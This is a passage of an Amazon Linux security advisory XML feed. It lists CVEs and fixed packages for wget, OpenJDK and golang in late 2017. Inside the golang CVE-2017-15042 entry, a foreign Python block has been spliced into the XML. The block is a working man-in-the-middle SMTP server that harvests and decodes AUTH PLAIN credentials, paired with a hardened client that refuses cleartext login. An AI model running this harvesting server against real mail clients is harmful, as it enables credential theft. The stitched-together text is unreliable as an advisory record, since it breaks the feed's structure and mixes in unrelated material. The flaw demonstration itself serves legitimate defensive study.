</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0898" title="" id="CVE-2017-0898" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0899" title="" id="CVE-2017-0899" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0900" title="" id="CVE-2017-0900" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0901" title="" id="CVE-2017-0901" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0902" title="" id="CVE-2017-0902" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0903" title="" id="CVE-2017-0903" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10784" title="" id="CVE-2017-10784" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14033" title="" id="CVE-2017-14033" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14064" title="" id="CVE-2017-14064" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ruby24-devel" version="2.4.2" release="1.30.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-devel-2.4.2-1.30.4.amzn1.x86_64.rpm</filename></package><package name="rubygem24-did_you_mean" version="1.1.0" release="1.30.4.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem24-did_you_mean-1.1.0-1.30.4.amzn1.noarch.rpm</filename></package><package name="rubygems24" version="2.6.13" release="1.30.4.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems24-2.6.13-1.30.4.amzn1.noarch.rpm</filename></package><package name="rubygem24-xmlrpc" version="0.2.1" release="1.30.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-xmlrpc-0.2.1-1.30.4.amzn1.x86_64.rpm</filename></package><package name="rubygems24-devel" version="2.6.13" release="1.30.4.amzn1" epoch="0" 
arch="noarch"><filename>Packages/rubygems24-devel-2.6.13-1.30.4.amzn1.noarch.rpm</filename></package><package name="rubygem24-json" version="2.0.4" release="1.30.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-json-2.0.4-1.30.4.amzn1.x86_64.rpm</filename></package><package name="rubygem24-bigdecimal" version="1.3.0" release="1.30.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-bigdecimal-1.3.0-1.30.4.amzn1.x86_64.rpm</filename></package><package name="ruby24" version="2.4.2" release="1.30.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-2.4.2-1.30.4.amzn1.x86_64.rpm</filename></package><package name="ruby24-debuginfo" version="2.4.2" release="1.30.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-debuginfo-2.4.2-1.30.4.amzn1.x86_64.rpm</filename></package><package name="rubygem24-io-console" version="0.4.6" release="1.30.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-io-console-0.4.6-1.30.4.amzn1.x86_64.rpm</filename></package><package name="ruby24-libs" version="2.4.2" release="1.30.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-libs-2.4.2-1.30.4.amzn1.x86_64.rpm</filename></package><package name="ruby24-irb" version="2.4.2" release="1.30.4.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby24-irb-2.4.2-1.30.4.amzn1.noarch.rpm</filename></package><package name="ruby24-doc" version="2.4.2" release="1.30.4.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby24-doc-2.4.2-1.30.4.amzn1.noarch.rpm</filename></package><package name="rubygem24-psych" version="2.2.2" release="1.30.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-psych-2.2.2-1.30.4.amzn1.x86_64.rpm</filename></package><package name="rubygem24-bigdecimal" version="1.3.0" release="1.30.4.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-bigdecimal-1.3.0-1.30.4.amzn1.i686.rpm</filename></package><package name="rubygem24-io-console" version="0.4.6" release="1.30.4.amzn1" epoch="0" 
arch="i686"><filename>Packages/rubygem24-io-console-0.4.6-1.30.4.amzn1.i686.rpm</filename></package><package name="ruby24-devel" version="2.4.2" release="1.30.4.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-devel-2.4.2-1.30.4.amzn1.i686.rpm</filename></package><package name="rubygem24-json" version="2.0.4" release="1.30.4.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-json-2.0.4-1.30.4.amzn1.i686.rpm</filename></package><package name="rubygem24-xmlrpc" version="0.2.1" release="1.30.4.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-xmlrpc-0.2.1-1.30.4.amzn1.i686.rpm</filename></package><package name="rubygem24-psych" version="2.2.2" release="1.30.4.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-psych-2.2.2-1.30.4.amzn1.i686.rpm</filename></package><package name="ruby24-debuginfo" version="2.4.2" release="1.30.4.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-debuginfo-2.4.2-1.30.4.amzn1.i686.rpm</filename></package><package name="ruby24" version="2.4.2" release="1.30.4.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-2.4.2-1.30.4.amzn1.i686.rpm</filename></package><package name="ruby24-libs" version="2.4.2" release="1.30.4.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-libs-2.4.2-1.30.4.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-916</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-916: important priority package update for wget</title><issued date="2017-10-26 19:41:00" /><updated date="2017-10-26 23:12:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-13090:
A heap-based buffer overflow, when processing chunked encoded HTTP responses, was found in wget. By tricking an unsuspecting user into connecting to a malicious HTTP server, an attacker could exploit this flaw to potentially execute arbitrary code.
1505445:
CVE-2017-13090 wget: Heap-based buffer overflow in HTTP protocol handling
CVE-2017-13089:
A stack-based buffer overflow, when processing chunked encoded HTTP responses, was found in wget. By tricking an unsuspecting user into connecting to a malicious HTTP server, an attacker could exploit this flaw to potentially execute arbitrary code.
1505444:
CVE-2017-13089 wget: Stack-based buffer overflow in HTTP protocol handling
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13089" title="" id="CVE-2017-13089" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13090" title="" id="CVE-2017-13090" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="wget" version="1.18" release="3.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/wget-1.18-3.28.amzn1.x86_64.rpm</filename></package><package name="wget-debuginfo" version="1.18" release="3.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/wget-debuginfo-1.18-3.28.amzn1.x86_64.rpm</filename></package><package name="wget-debuginfo" version="1.18" release="3.28.amzn1" epoch="0" arch="i686"><filename>Packages/wget-debuginfo-1.18-3.28.amzn1.i686.rpm</filename></package><package name="wget" version="1.18" release="3.28.amzn1" epoch="0" arch="i686"><filename>Packages/wget-1.18-3.28.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-917</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-917: critical priority package update for java-1.8.0-openjdk</title><issued date="2017-10-26 19:46:00" /><updated date="2017-10-26 23:27:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-10388:
It was discovered that the Kerberos client implementation in the Libraries component of OpenJDK used the sname field from the plain text part rather than encrypted part of the KDC reply message. A man-in-the-middle attacker could possibly use this flaw to impersonate Kerberos services to Java applications acting as Kerberos clients.
1502038:
CVE-2017-10388 OpenJDK: use of unprotected sname in Kerberos client (Libraries, 8178794)
CVE-2017-10357:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Serialization). Supported versions that are affected are Java SE: 6u161, 7u151, 8u144 and 9; Java SE Embedded: 8u144. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1502614:
CVE-2017-10357 OpenJDK: unbounded memory allocation in ObjectInputStream deserialization (Serialization, 8181597)
CVE-2017-10356:
It was discovered that the Security component of OpenJDK generated weak password-based encryption keys used to protect private keys stored in key stores. This made it easier to perform password guessing attacks to decrypt stored keys if an attacker could gain access to a key store.
1503169:
CVE-2017-10356 OpenJDK: weak protection of key stores against brute forcing (Security, 8181692)
CVE-2017-10355:
It was found that the FtpClient implementation in the Networking component of OpenJDK did not set connect and read timeouts by default. A malicious FTP server or a man-in-the-middle attacker could use this flaw to block execution of a Java application connecting to an FTP server.
1502869:
CVE-2017-10355 OpenJDK: no default network operations timeouts in FtpClient (Networking, 8181612)
CVE-2017-10350:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: JAX-WS). Supported versions that are affected are Java SE: 7u151, 8u144 and 9; Java SE Embedded: 8u144. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1502640:
CVE-2017-10350 OpenJDK: unbounded memory allocation in JAXWSExceptionBase deserialization (JAX-WS, 8181100)
CVE-2017-10349:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: JAXP). Supported versions that are affected are Java SE: 6u161, 7u151, 8u144 and 9; Java SE Embedded: 8u144. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1502611:
CVE-2017-10349 OpenJDK: unbounded memory allocation in PredicatedNodeTest deserialization (JAXP, 8181327)
CVE-2017-10348:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Libraries). Supported versions that are affected are Java SE: 6u161, 7u151, 8u144 and 9; Java SE Embedded: 8u144. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1502629:
CVE-2017-10348 OpenJDK: multiple unbounded memory allocations in deserialization (Libraries, 8181432)
CVE-2017-10347:
Vulnerability in the Java SE, JRockit component of Oracle Java SE (subcomponent: Serialization). Supported versions that are affected are Java SE: 6u161, 7u151, 8u144 and 9; Java SE Embedded: 8u144. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, JRockit. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, JRockit. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1502632:
CVE-2017-10347 OpenJDK: unbounded memory allocation in SimpleTimeZone deserialization (Serialization, 8181323)
CVE-2017-10346:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Hotspot). Supported versions that are affected are Java SE: 6u161, 7u151, 8u144 and 9; Java SE Embedded: 8u144. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 9.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H).
1501873:
CVE-2017-10346 OpenJDK: insufficient loader constraints checks for invokespecial (Hotspot, 8180711)
CVE-2017-10345:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: Serialization). Supported versions that are affected are Java SE: 6u161, 7u151, 8u144 and 9; Java SE Embedded: 8u144; JRockit: R28.3.15. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 3.1 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L).
1502858:
CVE-2017-10345 OpenJDK: unbounded resource use in JceKeyStore deserialization (Serialization, 8181370)
CVE-2017-10295:
It was found that the HttpURLConnection and HttpsURLConnection classes in the Networking component of OpenJDK failed to check for newline characters embedded in URLs. An attacker able to make a Java application perform an HTTP request using an attacker provided URL could possibly inject additional headers into the request.
1502687:
CVE-2017-10295 OpenJDK: HTTP client insufficient check for newline in URLs (Networking, 8176751)
CVE-2017-10285:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: RMI). Supported versions that are affected are Java SE: 6u161, 7u151, 8u144 and 9; Java SE Embedded: 8u144. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 9.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H).
1501868:
CVE-2017-10285 OpenJDK: incorrect privilege use when handling unreferenced objects (RMI, 8174966)
CVE-2017-10281:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: Serialization). Supported versions that are affected are Java SE: 6u161, 7u151, 8u144 and 9; Java SE Embedded: 8u144; JRockit: R28.3.15. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1502649:
CVE-2017-10281 OpenJDK: multiple unbounded memory allocations in deserialization (Serialization, 8174109)
CVE-2017-10274:
Vulnerability in the Java SE component of Oracle Java SE (subcomponent: Smart Card IO). Supported versions that are affected are Java SE: 6u161, 7u151, 8u144 and 9. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Java SE accessible data as well as unauthorized access to critical data or complete access to all Java SE accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 6.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N).
1502053:
CVE-2017-10274 OpenJDK: CardImpl incorrect state handling (Smart Card IO, 8169026)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10274" title="" id="CVE-2017-10274" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10281" title="" id="CVE-2017-10281" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10285" title="" id="CVE-2017-10285" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10295" title="" id="CVE-2017-10295" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10345" title="" id="CVE-2017-10345" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10346" title="" id="CVE-2017-10346" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10347" title="" id="CVE-2017-10347" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10348" title="" id="CVE-2017-10348" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10349" title="" id="CVE-2017-10349" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10350" title="" id="CVE-2017-10350" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10355" title="" id="CVE-2017-10355" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10356" title="" id="CVE-2017-10356" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10357" title="" id="CVE-2017-10357" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10388" title="" id="CVE-2017-10388" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.151" release="1.b12.35.amzn1" epoch="1" 
arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.151-1.b12.35.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.151" release="1.b12.35.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.151-1.b12.35.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.151" release="1.b12.35.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.151-1.b12.35.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.151" release="1.b12.35.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.151-1.b12.35.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc-zip" version="1.8.0.151" release="1.b12.35.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-zip-1.8.0.151-1.b12.35.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.151" release="1.b12.35.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.151-1.b12.35.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.151" release="1.b12.35.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.151-1.b12.35.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.151" release="1.b12.35.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.151-1.b12.35.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.151" release="1.b12.35.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.151-1.b12.35.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.151" release="1.b12.35.amzn1" epoch="1" 
arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.151-1.b12.35.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.151" release="1.b12.35.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.151-1.b12.35.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.151" release="1.b12.35.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.151-1.b12.35.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.151" release="1.b12.35.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.151-1.b12.35.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.151" release="1.b12.35.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.151-1.b12.35.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-918</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-918: medium priority package update for golang</title><issued date="2017-11-02 20:17:00" /><updated date="2017-11-03 05:50:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-15042:
An unintended cleartext issue exists in Go before 1.8.4 and 1.9.x before 1.9.1. RFC 4954 requires that, during SMTP, the PLAIN auth scheme must only be used on network connections secured with TLS. The original implementation of smtp.PlainAuth in Go 1.0 enforced this requirement, and it was documented to do so. In 2013, upstream issue #5184, this was changed so that the server may decide whether PLAIN is acceptable. The result is that if you set up a man-in-the-middle SMTP server that doesn&#039;t advertise STARTTLS and does advertise that PLAIN auth is OK, the smtp.PlainAuth implementation sends the username and password.
1498867:
CVE-2017-15042 golang: smtp.PlainAuth susceptible to man-in-the-middle password harvesting
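The exchange described above, replayed in-process as an added example (not code from the advisory or from Go's net/smtp): Python's smtplib has the same fall-back behaviour as the pre-1.8.4 smtp.PlainAuth, in that login() sends AUTH PLAIN whenever the server lists it, TLS or not. A constructed stand-in for the man-in-the-middle server advertises AUTH PLAIN, never offers STARTTLS, and records the AUTH line; the naive client hands over the password, while a client that enforces the RFC 4954 rule refuses. The server name, user name and password are made up, and the server listens only on a loopback ephemeral port.

```python
import base64
import smtplib
import socket
import ssl
import threading


class MitmSmtpServer:
    """Constructed stand-in for the attacker's SMTP server: it advertises AUTH PLAIN,
    never offers STARTTLS, and records every AUTH command it receives."""

    def __init__(self, connections=2):
        self.sock = socket.socket()
        self.sock.bind(("127.0.0.1", 0))
        self.sock.listen(connections)
        self.port = self.sock.getsockname()[1]
        self.auth_lines = []
        self.thread = threading.Thread(target=self._serve, args=(connections,), daemon=True)
        self.thread.start()

    def _serve(self, connections):
        for _ in range(connections):
            conn, _peer = self.sock.accept()
            with conn, conn.makefile("rb") as lines:
                conn.sendall(b"220 mail.example.test ESMTP\r\n")
                for raw in lines:
                    line = raw.decode("ascii", "replace").rstrip("\r\n")
                    verb = line.split(" ", 1)[0].upper()
                    if verb in ("EHLO", "HELO"):
                        # No STARTTLS in the extension list, but PLAIN is declared acceptable
                        conn.sendall(b"250-mail.example.test\r\n250 AUTH PLAIN\r\n")
                    elif verb == "AUTH":
                        self.auth_lines.append(line)   # the harvested credentials
                        conn.sendall(b"235 2.7.0 Authentication successful\r\n")
                    elif verb == "QUIT":
                        conn.sendall(b"221 2.0.0 Bye\r\n")
                        break
                    else:
                        conn.sendall(b"250 2.0.0 OK\r\n")
        self.sock.close()


def harvest_credentials(auth_line):
    """Decode what the server captured: AUTH PLAIN base64(NUL user NUL password)."""
    blob = base64.b64decode(auth_line.split()[2])
    _authzid, user, password = blob.decode("utf-8").split("\0")
    return user, password


def naive_login(port, user, password):
    """What smtplib.login (and Go's smtp.PlainAuth before 1.8.4) does: the server said
    PLAIN is acceptable, so the credentials go out over the cleartext connection."""
    with smtplib.SMTP("127.0.0.1", port, local_hostname="client.test", timeout=5) as smtp:
        smtp.login(user, password)


def tls_only_login(smtp, user, password):
    """Enforce RFC 4954 on the client side: PLAIN only over TLS, never downgrade."""
    smtp.ehlo_or_helo_if_needed()
    if not isinstance(smtp.sock, ssl.SSLSocket):
        if not smtp.has_extn("starttls"):
            raise RuntimeError("server offers no STARTTLS; refusing to send PLAIN credentials")
        smtp.starttls(context=ssl.create_default_context())
        smtp.ehlo()   # extensions must be re-read after the TLS upgrade
    smtp.login(user, password)


def hardened_login(port, user, password):
    """Return the refusal message, or None if the login went through."""
    try:
        with smtplib.SMTP("127.0.0.1", port, local_hostname="client.test", timeout=5) as smtp:
            tls_only_login(smtp, user, password)
    except RuntimeError as exc:
        return str(exc)
    return None


def demo(user="alice", password="hunter2"):
    """Run both clients against the MITM server; return (harvested credentials, refusal)."""
    server = MitmSmtpServer(connections=2)
    naive_login(server.port, user, password)
    refusal = hardened_login(server.port, user, password)
    server.thread.join(timeout=5)
    harvested = [harvest_credentials(line) for line in server.auth_lines]
    return harvested, refusal


if __name__ == "__main__":
    print(demo())
```

The hardened client checks the live socket type rather than trusting the EHLO banner: a server that advertises STARTTLS but later fails the upgrade still leaves the socket unencrypted, and that is the state that matters when PLAIN is about to be sent.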
CVE-2017-15041:
Go before 1.8.4 and 1.9.x before 1.9.1 allows &quot;go get&quot; remote command execution. Using custom domains, it is possible to arrange things so that example.com/pkg1 points to a Subversion repository but example.com/pkg1/pkg2 points to a Git repository. If the Subversion repository includes a Git checkout in its pkg2 directory and some other work is done to ensure the proper ordering of operations, &quot;go get&quot; can be tricked into reusing this Git checkout for the fetch of code from pkg2. If the Subversion repository&#039;s Git checkout has malicious commands in .git/hooks/, they will execute on the system running &quot;go get.&quot;
1498870:
CVE-2017-15041 golang: arbitrary code execution during go get or go get -d
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15041" title="" id="CVE-2017-15041" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15042" title="" id="CVE-2017-15042" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang-bin" version="1.8.4" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.8.4-1.41.amzn1.x86_64.rpm</filename></package><package name="golang-tests" version="1.8.4" release="1.41.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.8.4-1.41.amzn1.noarch.rpm</filename></package><package name="golang-src" version="1.8.4" release="1.41.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.8.4-1.41.amzn1.noarch.rpm</filename></package><package name="golang-docs" version="1.8.4" release="1.41.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.8.4-1.41.amzn1.noarch.rpm</filename></package><package name="golang-race" version="1.8.4" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-race-1.8.4-1.41.amzn1.x86_64.rpm</filename></package><package name="golang-misc" version="1.8.4" release="1.41.amzn1" epoch="0" 